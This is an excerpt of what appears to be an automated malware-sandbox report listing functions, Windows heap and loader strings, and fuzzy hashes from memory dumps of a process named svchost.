Instruction Fuzzy Hash: 90A1E231A00205DBEB29DF24C850B7ABBF1AF45384F14856DD7868B781DFB5E948CB91

Function 02F2F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F8E54E
HEAP[%wZ]: , xrefs: 02F8E3FE
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02F8E563
`, xrefs: 02F8E428

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: b6ef52b1c8149c144070b14922a72ab81852a9438c9bbad6dbb3cc2958d2e661
Instruction ID: a60e8d2a3bb0a8980b4655411a812a35451fcbcef0fde6233f9d1727214d2d57
Opcode Fuzzy Hash: b6ef52b1c8149c144070b14922a72ab81852a9438c9bbad6dbb3cc2958d2e661
Instruction Fuzzy Hash: 7C612072204284AFE721EB28CD54F67BBF9EF85794F140568FB558B691C734E804CB62

Function 00402170 Relevance: 5.2, Strings: 4, Instructions: 165COMMON

Download Yara Rule

Strings

gfff, xrefs: 00402181
gfff, xrefs: 00402271
gfff, xrefs: 004021C4
VUUU, xrefs: 00402228

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: VUUU$gfff$gfff$gfff
API String ID: 0-1210399089
Opcode ID: 93c7f2baed2573bc23ce3239d53a86ec38f1afc2ed01b0ccafe21f009a040894
Instruction ID: 309a942c4d9ad85ad9a62e50325fa5777672e6da00cc5c7fff5bc1dc0cdd43e7
Opcode Fuzzy Hash: 93c7f2baed2573bc23ce3239d53a86ec38f1afc2ed01b0ccafe21f009a040894
Instruction Fuzzy Hash: BF414B227000590BCB2C489EDE983BA6286E7E5314F4881BFD99ADF3D4E8BC9D465149

Function 0040216E Relevance: 5.2, Strings: 4, Instructions: 153COMMON

Download Yara Rule

Strings

gfff, xrefs: 00402181
gfff, xrefs: 00402271
gfff, xrefs: 004021C4
VUUU, xrefs: 00402228

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: VUUU$gfff$gfff$gfff
API String ID: 0-1210399089
Opcode ID: c8957c80cbe807c6477538c71f25df4ae466e61087f050b6c1e66030d3cf1db8
Instruction ID: cfc136b13368c47363b7196e0ac4bd7727a50ab27868f0ed724f19287644db75
Opcode Fuzzy Hash: c8957c80cbe807c6477538c71f25df4ae466e61087f050b6c1e66030d3cf1db8
Instruction Fuzzy Hash: 95412922B0001907CB2C889EDE983BA7247E7E5314F48817FDD9ADF3D5E8BCAD425189

Function 02FE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 02FE12D6
HEAP: , xrefs: 02FE124A, 02FE125D, 02FE125F, 02FE12C4
HEAP[%wZ]: , xrefs: 02FE123D, 02FE12B7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 02FE1261

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 5e6e090f8d023de6d7255477ade647d0a0b106c24e5ce1f5488ab53f986020df
Instruction ID: ac269fa894ccc228ad20eea04fd211d3821c05333d77fdc1049fd70f7e9ea3e4
Opcode Fuzzy Hash: 5e6e090f8d023de6d7255477ade647d0a0b106c24e5ce1f5488ab53f986020df
Instruction Fuzzy Hash: 5A31AB32600114EFEB12DB99CC85FA773E9EF097E8F144059EA0ADB290D670ED44DE66

Function 02F29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F8BAAD, 02F8BAEA
VirtualQuery Failed 0x%p %x, xrefs: 02F8BAF7
HEAP[%wZ]: , xrefs: 02F8BAA0, 02F8BADD
VirtualProtect Failed 0x%p %x, xrefs: 02F8BABA

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 70972a6d8696fe39ce041fc529d0f92bcd18e331251f90d0de8281a21b45f8aa
Instruction ID: b6494b9e82cc4eda64860cfe20a882c7cf4c4817be5a10cbcd002f3faa11ff84
Opcode Fuzzy Hash: 70972a6d8696fe39ce041fc529d0f92bcd18e331251f90d0de8281a21b45f8aa
Instruction Fuzzy Hash: FD31C632A00124EFEB11EB45CC85F9AB7B9EF467E8F244051EE15A7290D7B0ED44CE61

Function 02F429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F43264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 02F4327D
HEAP[%wZ]: , xrefs: 02F43255

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 56d83c5f44a223e6e433148ed4cc67f2c33f776be0aa45e429e6c4278cd22fd8
Instruction ID: e304890738d4e14071065143958b786912ad087abdacad2e84d2fd76c6ef0a4e
Opcode Fuzzy Hash: 56d83c5f44a223e6e433148ed4cc67f2c33f776be0aa45e429e6c4278cd22fd8
Instruction Fuzzy Hash: DD92AB71E042499FDB25CF68C844BADBFF1EF48354F2480A9EA45AB391DBB4A941CF50

Function 02FC02C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON

Download Yara Rule

Strings

"""", xrefs: 02FC04D0
MitigationAuditOptions, xrefs: 02FC032D
MitigationOptions, xrefs: 02FC0326

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: """"$MitigationAuditOptions$MitigationOptions
API String ID: 0-1670051934
Opcode ID: 54bdf70d559e9573ccc9c38b07ce54b78b751408ba8ca56bd7efe71ca0140fcd
Instruction ID: 8e399c93c4e715626a49e3f090ffd5b38f4dee52f57d24e82654be0b2d81e540
Opcode Fuzzy Hash: 54bdf70d559e9573ccc9c38b07ce54b78b751408ba8ca56bd7efe71ca0140fcd
Instruction Fuzzy Hash: C6228172A08706CFD724CF29CA51626FBE1BBC4354F24892EE29A87790DB71D546CF41

Function 02F41F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F4212E, 02F95E53, 02F96001, 02F9614B
HEAP[%wZ]: , xrefs: 02F42155, 02F95E46, 02F95FF4, 02F9613E
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02F4216B, 02F95E68, 02F96016, 02F96160

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 6533e5b03bfc25d30f15d16baf7b964c3a23097947944bfd6c99113cd76cfa15
Instruction ID: be3c8507ad4e04da660d7dd56e6d46913a344f9e9c2b4adf560a4ffec8d6bc3a
Opcode Fuzzy Hash: 6533e5b03bfc25d30f15d16baf7b964c3a23097947944bfd6c99113cd76cfa15
Instruction Fuzzy Hash: FA223570A006019FFB15DF28C890B7ABBF9FF05B88F148059EA46CB295DB75E885CB50

Function 02F40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F950BD
HEAP[%wZ]: , xrefs: 02F950AE
(UCRBlock->Size >= *Size), xrefs: 02F950CA

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: e9d75e1e7d2ca4fff55263c89b417b9dc10defb9ce22503dff38aea36ee1e15c
Instruction ID: 484a159e1e636d2dd17012a3b171f3cef553fce2e45cf030070b036efe793109
Opcode Fuzzy Hash: e9d75e1e7d2ca4fff55263c89b417b9dc10defb9ce22503dff38aea36ee1e15c
Instruction Fuzzy Hash: 0DF19931B00605DFEB19CF68C990B6ABBB5FF44384F1441A9E6169B391DB74E981CF90

Function 02F31460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F31596
HEAP[%wZ]: , xrefs: 02F31712
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02F31728

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: feb41be22042e1c6de1e5a4528725a5709240bb44bbeb1d59ac9d48d91cd1521
Instruction ID: 09e8b3a412393a9daeb900fe0bc02b1fabf31146d42906aa3bd12abe53a40d30
Opcode Fuzzy Hash: feb41be22042e1c6de1e5a4528725a5709240bb44bbeb1d59ac9d48d91cd1521
Instruction Fuzzy Hash: F3E10171A042459FDB2ACF68C491B7BBBF1AF49384F18855DEA9ACB245D734E840CB50

Function 02F3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 02F3B714
LdrResGetRCConfig Enter, xrefs: 02F3B702
MUI, xrefs: 02F3B6D8, 02F3B7E7

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: f3ac7ba8496b6319ebe665582056d6cc17c684899a9915abfad72850ac159c45
Instruction ID: a3cdd4402a11690d9a91ee28f6c7f3d18d197ccf8344c066617b8a24598ff730
Opcode Fuzzy Hash: f3ac7ba8496b6319ebe665582056d6cc17c684899a9915abfad72850ac159c45
Instruction Fuzzy Hash: C0B1AD72E056088FEF26CF59C990FADB7B6EF44398F144569EA51EB280D730E840CB00

Function 02FB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

\SystemRoot\system32\, xrefs: 02FB3842
@, xrefs: 02FB389F
DelegatedNtdll, xrefs: 02FB36CE

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: 0b4e0b12a20ec3b8061a9cb574b9cde759273f3283cc750cb9ed6cf647d541ce
Instruction ID: 414a29d4ca1dd063a1a58a588a3bf7dc8024346768b4fc04504134d9877469f6
Opcode Fuzzy Hash: 0b4e0b12a20ec3b8061a9cb574b9cde759273f3283cc750cb9ed6cf647d541ce
Instruction Fuzzy Hash: A2B1C172A44345AFE722DE56CC80FABB7E9EF45794F11096AFB4097280C775E804CB92

Function 02F56962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 02F56C24
, xrefs: 02F9CA51

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 54c0fd818d744fce721909bf3138630e6664b3eb33a2dffb4782b0710ac39e40
Instruction ID: cf7d06999da9ec5c906b90a129cb0407d5f922a4f406144649c2e5ca83be9e7d
Opcode Fuzzy Hash: 54c0fd818d744fce721909bf3138630e6664b3eb33a2dffb4782b0710ac39e40
Instruction Fuzzy Hash: DFC28172A083519FEB25DF24C840BABBBE5AF88784F04892DEF99D7241D734D845CB52

Function 02F2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 02F8C1E4
FilterFullPath, xrefs: 02F8C2E6
UseFilter, xrefs: 02F2A1C1

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: c32f9a988065948e654dd424284b7aa101b4307c9e6d3ae604ec6e05767bb7fa
Instruction ID: 1958c3bfb66959d5f9f647e7df55495a2a46c0d08e863e6496d5c6c720d9c83f
Opcode Fuzzy Hash: c32f9a988065948e654dd424284b7aa101b4307c9e6d3ae604ec6e05767bb7fa
Instruction Fuzzy Hash: 64A17D71D016299BDB31EF64CC88BAAF7B9EF44744F1001EAEA09A7250D7359E85CF60

Function 02FC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

LdrpResMapFile Enter, xrefs: 02FC3715
@, xrefs: 02FC3867
LdrpResMapFile Exit, xrefs: 02FC3727

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: b372a788e8fc79aafe75cf5242b73ef3c8090e52c0d61c5d0fba45c8b677d180
Instruction ID: 81a4594c3c1ff7cd83e4cc83f39296257c026f90a59ec9aa2e639a2769792798
Opcode Fuzzy Hash: b372a788e8fc79aafe75cf5242b73ef3c8090e52c0d61c5d0fba45c8b677d180
Instruction Fuzzy Hash: 7181AC71A08346AFD3119B14CA44F6AB7E9EF847C4F2489ADFE8197390D774D904CB52

Function 02F6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

&, xrefs: 02FA5CF8
@, xrefs: 02F69148
%, xrefs: 02FA5D3F

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: bbf334ff7ba6fba878b38553385942be3872a37898b2f906d7ec89968e34b8a5
Instruction ID: 216a66bbff7a475f971db9d2ba3b2696a6ac822e05d5b1165974975395abb7a8
Opcode Fuzzy Hash: bbf334ff7ba6fba878b38553385942be3872a37898b2f906d7ec89968e34b8a5
Instruction Fuzzy Hash: 2971E471A093019FD710DF24C988A3BBBE6FF84798F60491EE6A687250C770D805CF52

Function 0300B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0300B82A
TargetNtPath, xrefs: 0300B82F
GlobalizationUserSettings, xrefs: 0300B834

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 9e01031dbbec496ad25cbc69303846d0b0d03c51665ca5d7334b0b97d94e4be4
Instruction ID: 0a0364e79818e7ec3d7397236ac91a3ae41617b34c33ffd2378e9ae933d07dd9
Opcode Fuzzy Hash: 9e01031dbbec496ad25cbc69303846d0b0d03c51665ca5d7334b0b97d94e4be4
Instruction Fuzzy Hash: BD614F72D42229ABEB21DF54DC88BDAF7B9AF14750F0101E5A609A7290DB74DE84CF90

Function 00402BBC Relevance: 3.9, Strings: 3, Instructions: 173COMMON

Download Yara Rule

Strings

f, xrefs: 00402C16
gfff, xrefs: 00402C65
VUUU, xrefs: 00402BF1

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: VUUU$f$gfff
API String ID: 0-762387060
Opcode ID: 95b65a4a3a841e8b8bede2313b1a7fe5d7f027a836e8f3c39270ca8f1e1a520f
Instruction ID: 712a074d3a02cf6057d881381e751a799bccb5556a158f3e5f25911da747a66f
Opcode Fuzzy Hash: 95b65a4a3a841e8b8bede2313b1a7fe5d7f027a836e8f3c39270ca8f1e1a520f
Instruction Fuzzy Hash: 53519071E0425A0BDB148D9DCD843DEBA62EBD8314F28827ADD54FF3C5D5B89E058784

Function 00402BC0 Relevance: 3.9, Strings: 3, Instructions: 171COMMON

Download Yara Rule

Strings

f, xrefs: 00402C16
gfff, xrefs: 00402C65
VUUU, xrefs: 00402BF1

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: VUUU$f$gfff
API String ID: 0-762387060
Opcode ID: 3ca6c4f165ecab8cddf3cc0344dee2da9c93708afeca9dc40e7f3023f05c0606
Instruction ID: e8beb528b7044b41d67c495d8c6a3daefd55039f3a5d217ec987f208a816c301
Opcode Fuzzy Hash: 3ca6c4f165ecab8cddf3cc0344dee2da9c93708afeca9dc40e7f3023f05c0606
Instruction Fuzzy Hash: D6519E71E0425A0BDB148D9DCE843DEB6A1EBD8314F28827ADD54FF3C5D5B89E058788

Function 02F2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02F8E6B3
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02F8E6C6
HEAP[%wZ]: , xrefs: 02F8E6A6

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 003fa7611a7caebfb8f65c000fe12188014aa06a403b269ca497a4ecfdc8ce6b
Instruction ID: 9ce0abc9846b9a46e13acad0a969c563d6b4832c3b9a3002bdcc638549e73ff7
Opcode Fuzzy Hash: 003fa7611a7caebfb8f65c000fe12188014aa06a403b269ca497a4ecfdc8ce6b
Instruction Fuzzy Hash: EA51E331610654EFE722EB68C994FA6FBF9FF06384F1401A4E7419BA92D774E904CB11

Function 02FDDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

Heap block at %p modified at %p past requested size of %Ix, xrefs: 02FDDC32
HEAP: , xrefs: 02FDDC1F
HEAP[%wZ]: , xrefs: 02FDDC12

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: f1d33a91812bb4e7008453469d54a74194a06fcdc4fd3c9b8b0876a3804ddb42
Instruction ID: 86e380c8d03233f55209cec32a157aaf2d6be3244148a9e0c0719d00b91f4383
Opcode Fuzzy Hash: f1d33a91812bb4e7008453469d54a74194a06fcdc4fd3c9b8b0876a3804ddb42
Instruction Fuzzy Hash: 215115376005548AE774DB2AC844772B7E3EF453CCF1C888AE6C28B685D376E846DB61

Function 02F616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 02FA1B39
minkernel\ntdll\ldrtls.c, xrefs: 02FA1B4A
LdrpAllocateTls, xrefs: 02FA1B40

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: bfc485b1e5fb426d2688f1d2240d68286b9c25d9205f803fab2cdd7d8fe547d9
Instruction ID: 02907eda185c5254d189c8b2453cf62fc16123623963994f086cc119d1ee3a44
Opcode Fuzzy Hash: bfc485b1e5fb426d2688f1d2240d68286b9c25d9205f803fab2cdd7d8fe547d9
Instruction Fuzzy Hash: 09416AB5A01608AFDB15DFA8CC51BAEBBF6FF48794F144159E60AA7250D774A800CFA0

Function 02FEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 02FEC212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02FEC1C5
@, xrefs: 02FEC1F1

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 4014afaa5457e73d4326c5b488c4b3c481b87ffefc3fd1da873a8fdea8c857a7
Instruction ID: a3c5d02b082271866695e8c921aebc170b063d87bc7d1769813cd431fadce4eb
Opcode Fuzzy Hash: 4014afaa5457e73d4326c5b488c4b3c481b87ffefc3fd1da873a8fdea8c857a7
Instruction Fuzzy Hash: 62413172E00219ABDF11DED4C891BEEB7B9AB14B84F14416BEB06B7280D7749A44CB50

Function 02FC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 02FC4160
@, xrefs: 02FC4225
LdrpResValidateFilePath Exit, xrefs: 02FC4172

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 37962e4731ff5813eedbb1736223b1c455912f4185cb838cbe243105b8eb840e
Instruction ID: 068f37f9c9fe23710dc2130c8ac5431af176335d097d1a2f78b28a9f9ccea024
Opcode Fuzzy Hash: 37962e4731ff5813eedbb1736223b1c455912f4185cb838cbe243105b8eb840e
Instruction Fuzzy Hash: 7641D072A002598BEB26DBA4CE54BEDBBB5EF55384F24049EDA41FB781DB748901CB10

Function 02FB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 02FB4899
LdrpCheckRedirection, xrefs: 02FB488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02FB4888

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: f64feaf9ce9969dd4b2763bc820a47898eea2d507d043ff4bc3f1a1a9ad60ac1
Instruction ID: b8ad5a4bd86b4e562cad4d3b232fa92b04c97edd6e477612a414f28079c37e05
Opcode Fuzzy Hash: f64feaf9ce9969dd4b2763bc820a47898eea2d507d043ff4bc3f1a1a9ad60ac1
Instruction Fuzzy Hash: 0A410632B016949FCF22DE1ADA60EA7B7E4AF497D0F150259EE49D7752D330D800CB91

Function 02F633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

Actx , xrefs: 02F633AC
RtlCreateActivationContext, xrefs: 02FA29F9
SXS: %s() passed the empty activation context data, xrefs: 02FA29FE

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 07602ef8c6bf8de6d92620c9a473f005e3706a4efdb7488f99f2dfcbfa1f5bac
Instruction ID: d89d668973b75fbc42d8d8e7c2a0ae3ca890c8f465598b0dcc86de226f0bb89d
Opcode Fuzzy Hash: 07602ef8c6bf8de6d92620c9a473f005e3706a4efdb7488f99f2dfcbfa1f5bac
Instruction Fuzzy Hash: 683146326003059FEB26DE58CC94BA6B7A5FF44B94F1544A9FF069F686CB70D841CB90

Function 02F61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

LdrpInitializeTls, xrefs: 02FA1A47
DLL "%wZ" has TLS information at %p, xrefs: 02FA1A40
minkernel\ntdll\ldrtls.c, xrefs: 02FA1A51

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 847417a80ce4d89623ae1a2d61c7b2fe626b888472c80342f32a4f62c00be5d2
Instruction ID: 99733c9fea443ad7164bcde4ab9fb56bc93b3275069ec0499693cecbad0c0422
Opcode Fuzzy Hash: 847417a80ce4d89623ae1a2d61c7b2fe626b888472c80342f32a4f62c00be5d2
Instruction Fuzzy Hash: 7B31F876A01200AFE7209B58CC49F7BB7B9FB557D4F250159E709A7280E774AD048F94

Function 02F71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02F7127B
BuildLabEx, xrefs: 02F7130F
@, xrefs: 02F712A5

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: e7f1c65e2ac0c893d8cbed8f8b5020f02a71740a199711fe59071d9a8e49d2c5
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 96318F72A00519ABDF11AFA5CC44EAFBBBEEB84794F004066EB14A71A0D770DA05CB60

